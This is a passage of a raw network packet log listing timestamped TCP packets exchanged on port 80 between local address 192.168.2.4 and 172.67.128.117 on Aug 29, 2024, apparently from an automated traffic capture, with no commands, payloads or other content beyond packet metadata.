                                  Aug 29, 2024 23:42:08.996346951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996397018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996416092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996428013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996438980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996450901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996462107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996462107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996483088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996504068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996548891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996560097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996592045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996597052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996608973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996614933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996637106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996648073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996665001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996676922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996686935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996696949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996710062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996733904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996817112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996830940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996843100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996854067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996860027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996866941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996877909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996886969 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996890068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996912956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996925116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997486115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997535944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997536898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997546911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997575998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997579098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997589111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997591019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997613907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997634888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997670889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997685909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997695923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997705936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997710943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997718096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997730017 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997745991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997755051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997860909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997873068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997903109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997921944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997962952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997975111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997983932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998007059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998024940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998186111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998230934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998325109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998336077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998344898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998362064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998373032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998383045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998384953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998400927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998411894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998414040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998423100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998433113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998433113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998446941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998455048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998457909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998471022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998481989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998500109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998521090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.999495029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.999551058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.082032919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082050085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082055092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082058907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082063913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082068920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082073927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082277060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082304955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082317114 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.082351923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.082360029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082374096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082380056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082406044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.082434893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.082511902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082520962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082530022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.082551956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.082571030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083076954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083087921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083096981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083123922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083148003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083153963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083161116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083170891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083180904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083192110 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083213091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083235025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083539009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083555937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083565950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083579063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083590031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083611965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083669901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083681107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083686113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083693981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083717108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083740950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083760977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083770990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083781004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083794117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083801031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083805084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083822012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083847046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083849907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083859921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083872080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083882093 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083888054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083918095 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083945036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.083980083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.083991051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084000111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084012032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084022999 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084059000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084093094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084104061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084114075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084120989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084131956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084161043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084479094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084525108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084599018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084608078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084616899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084630013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084639072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084659100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084667921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084677935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084681034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084683895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084708929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084722042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084904909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084916115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084924936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084934950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084947109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084948063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084959984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084975004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084976912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084988117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.084995985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.084997892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085010052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085019112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085026979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085037947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085047007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085050106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085057974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085067987 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085076094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085079908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085088968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085092068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085108995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085118055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085119009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085129976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085130930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085160017 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085174084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085180998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085187912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.085211039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.085228920 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.086806059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.086833000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.086858034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.086869955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087027073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087071896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087099075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087138891 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087321043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087362051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087421894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087430954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087444067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087447882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087469101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087496996 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087497950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087508917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087517977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087539911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087558985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087594032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087605000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087615013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087625027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087635994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087658882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087706089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087749958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087780952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087790966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087800026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087810993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087819099 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087821007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087837934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087853909 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087871075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087872982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087882042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087898016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087908030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087917089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087917089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087929010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.087939024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.087939978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266869068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266880035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266889095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266891003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266916990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266917944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266946077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266957998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267003059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267014980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267024040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267041922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267043114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267055988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267069101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267091036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267102003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267118931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267131090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267143965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267153025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267163038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267168045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267174959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267193079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267205954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267234087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267246008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267255068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267266035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267277002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267277956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267288923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267302036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267330885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267477036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267488003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267501116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267515898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267518997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267528057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267538071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267539978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267549038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267558098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267565012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267570019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267580986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267589092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267590046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267601967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267601967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267621994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267647028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.347863913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347873926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347878933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347882032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347887039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347892046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347897053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347901106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348093033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348104000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348115921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348172903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348172903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348200083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348212004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348222017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348229885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348233938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348242998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348251104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348259926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348284960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348687887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348737955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348823071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348834038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348845005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348855972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348865986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348870039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348879099 CEST8049730172.67.128.117192.168.2.4
